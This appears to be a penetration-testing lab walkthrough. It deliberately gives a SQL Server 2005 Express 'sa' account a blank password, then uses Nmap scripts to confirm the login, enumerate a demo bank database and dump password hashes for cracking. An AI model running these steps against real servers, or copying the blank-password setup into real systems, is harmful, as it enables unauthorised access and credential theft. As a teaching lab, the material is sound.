… If you are making fun of people who use “SQL” to mean “MS SQL Server”, that’s very funny.

29 Mar 2012 – 3 Responses to Thank you to all our supporters! Annabelle From Sanibel says: March 29, 2012 at 10:04 pm. Kate…. never apologize for doing …

12 Mar 2012 – 22 followers…REALLY I have…I love it.. I typed that with a Welsh accent!!! So I seen Wanderlust today who said she had been told to read my …

1. Changes made to SQLEXPRESS so we could make this lab work.

WinXP with Microsoft SQL Server 2005 RTM

Regedit

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Microsoft SQL Server/MSSQLServer/
DWORD - LoginMode + rightclick Modify Value data: = 2

C:\Documents and Settings\test>osql -E .\SQLEXPRESS
1> ALTER LOGIN sa enable;
2> go
1> ALTER LOGIN sa WITH PASSWORD=''
2> go
Msg 15118, Level 16, State 1, Server TP-A123456789BCD\SQLEXPRESS, Line 1
Password validation failed. The password does not meet Windows policy
requirements because it is not complex enough.
1> ALTER LOGIN sa WITH PASSWORD='', CHECK_POLICY=OFF
2> go
1>

------------------------------------------------------------

2. Testing the account works

C:\Documents and Settings\test>osql -S .\SQLEXPRESS -U sa (press enter)
Password: (press enter)
1>

------------------------------------------------------------

3. Now SQL has been made vulnerable use Nmap to test for MSSQL info.

Backtrack 5 R1

root@bt:~# nmap -p 445 --script ms-sql-info IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 14:59 BST
Nmap scan report for IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-info:
| Windows server name: TP-A123456789BCD
| [IP-Address\SQLEXPRESS]
| Instance name: SQLEXPRESS
| Version: Microsoft SQL Server 2005 RTM
| Version number: 9.00.1399.00
| Product: Microsoft SQL Server 2005
| Service pack level: RTM
| Post-SP patches applied: No
| TCP port: 1433
|_ Clustered: No

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

------------------------------------------------------------

4. Nmap to test for MSSQL User name SA password blank (default account) on port 1433

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-empty-password --script-args mssql.instance-all IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 14:59 BST
Nmap scan report for IP-Address
Host is up (0.00066s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-empty-password:
| [IP-Address\SQLEXPRESS]
|_ sa: => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

------------------------------------------------------------

5. Nmap to test for MSSQL User name SA password blank (default account) on port 445

Backtrack 5 R1

root@bt:~# nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:00 BST
Nmap scan report for IP-Address
Host is up (0.00061s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-empty-password:
| [IP-Address\SQLEXPRESS]
|_ sa: => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

------------------------------------------------------------

6. Nmap queries Microsoft SQL Server (ms-sql) for a list of tables per database.

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:23 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
| [IP-Address:1433]
| FoundStone_Bank
| table column type length
| ===== ====== ==== ======
| fsb_accounts account_no numeric 9
| fsb_accounts account_type varchar 50
| fsb_accounts balance_amount numeric 13
| fsb_accounts branch varchar 200
| fsb_accounts creation_date datetime 8
| fsb_accounts currency varchar 5
| fsb_accounts user_id numeric 9
| fsb_users creation_date datetime 8
| fsb_users login_id varchar 20
| fsb_users password varchar 20
| fsb_users user_id numeric 9
| fsb_users user_name varchar 200
|
| Restrictions
| Output restricted to 2 tables (see ms-sql-tables.maxtables)
| Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_ No filter (see ms-sql-tables.keywords)
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

------------------------------------------------------------

7. Nmap queries Microsoft SQL Server (ms-sql) instances for a list of databases a user has access to.

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:49 BST
Nmap scan report for IP-Address
Host is up (0.00051s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-hasdbaccess:
| [IP-Address:1433]
| sa (Showing 5 first results)
| dbname owner
| ====== =====
|_ FoundStone_Bank TP-A123456789BCD\test
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

------------------------------------------------------------

8. Nmap Dumps the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

Backtrack 5 R1

root@bt:~# nmap -p 1433 IP-Address --script ms-sql-dump-hashes --script-args mssql.username=sa,ms-sql-empty-password

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:52 BST
Nmap scan report for IP-Address
Host is up (0.00040s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [IP-Address:1433]
|_ sa:0x01004086CEB608F48FAECCE50524FAB7AEF778643C96B8F83E03
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
root@bt:~/tor-browser_en-US#

------------------------------------------------------------

9. Nmap queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings.

root@bt:~# nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:56 BST
Nmap scan report for IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-config:
| [IP-Address:1433]
| Databases
| name db_size owner
| ==== ======= =====
| FoundStone_Bank 2.73 MB TP-A123456789BCD\test
| Configuration
| name value inuse description
| ==== ===== ===== ===========
| SQL Mail XPs 0 0 Enable or disable SQL Mail XPs
| Database Mail XPs 0 0 Enable or disable Database Mail XPs
| SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs
| Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures
| Web Assistant Procedures 0 0 Enable or disable Web Assistant Procedures
| xp_cmdshell 0 0 Enable or disable command shell
| Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries
|_ Replication XPs 0 0 Enable or disable Replication XPs
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

------------------------------------------------------------

http://www.myexploit.wordpress.com/information-gathering-nmap/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s